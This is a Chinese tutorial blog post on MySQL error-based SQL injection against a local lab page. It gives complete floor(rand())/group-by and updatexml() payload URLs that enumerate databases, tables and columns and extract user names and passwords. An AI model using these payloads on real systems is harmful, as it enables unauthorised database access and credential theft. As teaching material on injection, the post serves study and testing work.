报错注入

简介: 报错注入

一、相关函数

1、rand():产生一个0-1之间随机数,rand(0),随机产生一个0-1的随机数,运行多次产生的结果一样

2、floor():向下取整,floor(rand()*2),随机产生0和1两个数

3、group by:分组排列

4、count(*):统计数量

0a2653c851af460fa595bd959398a8f1.png

5、concat():将字符串连接起来

二、通过floor()函数构造注入语句

1、访问http://192.168.0.104/aiyou/bczr.php?id=2,返回正常页面

0eacb84100b54626af849e6b562bf92a.png

2、访问http://192.168.0.104/aiyou/bczr.php?id=2',返回错误页面

2d65d23f6d4748949b924e4057485923.png

3、构造闭合语句,192.168.0.104/aiyou/bczr.php?id=2' --+,页面返回正常

4、获取数据库版本

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,(version()))x from information_schema.tables group by x )a) --+

2e9b90b2ca334476abebe75bafe6eeaa.png

5、获取数据库名称

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,database(),0x23)x from information_schema.tables group by x )a) --+

6、获取其他数据库名称(修改红色数字,获取不同数据库名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

7、获取表名(修改红色数字,获取不同表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

8、获取字段名,需要指定表名,表名用十六进制表示,修改红色数字获取不同字段

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x75736572 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

0a2653c851af460fa595bd959398a8f1.png

9、获取字段内容

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,name,0x3a,pass,0x23) FROM user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

--+

0eacb84100b54626af849e6b562bf92a.png

三、通过updatexml函数构造注入语句

1、获取数据库名称(通过修改红色数字获取不同的数据库名称)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 5,1),1) -- +

2、获取表名(通过修改红色数字获取不同的表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 1,1),1) -- +

3、获取字段名(通过修改红色数字获取不同的字段)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、获取字段内容(修改红色数字,获取不同字段内容)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, pass,0x7e,name,0x7e) from user limit 1,1),1) -- +

2d65d23f6d4748949b924e4057485923.png

禁止非法,后果自负

目录
相关文章
|
6月前
|
XML 安全 数据库
24、显错注入(updatexml和extractvalue)
24、显错注入(updatexml和extractvalue)
49 0
|
6月前
|
Java 开发者 Spring
Spring中获取Bean对象的三种注入方式和两种注入方法
Spring中获取Bean对象的三种注入方式和两种注入方法
|
8天前
|
SQL 安全 关系型数据库
beescms注入
通过 SQL 注入、弱口令爆破和文件上传三种方式对系统进行安全测试的过程。首先,通过手动注入和报错注入获取数据库信息,接着利用弱口令爆破工具尝试登录,最后通过修改 MIME 类型绕过文件上传限制,成功获取 shell。
beescms注入
|
6月前
|
数据库
报错注入
报错注入
35 1
|
6月前
|
关系型数据库 MySQL
Mysql注入 -- 注入类型
Mysql注入 -- 注入类型
43 1
|
6月前
|
数据库
13、报错注入(Get)
13、报错注入(Get)
30 0
|
6月前
|
SQL 关系型数据库 MySQL
注入工具 -- sqlmap(注入参数)
注入工具 -- sqlmap(注入参数)
105 0
|
6月前
|
安全 关系型数据库 MySQL
Mysql注入 -- 报错注入
Mysql注入 -- 报错注入
51 0
|
6月前
|
安全 Python
注入工具 -- DSSS
注入工具 -- DSSS
51 0
|
XML Java 数据格式
SpringXML实现注入
SpringXML实现注入
SpringXML实现注入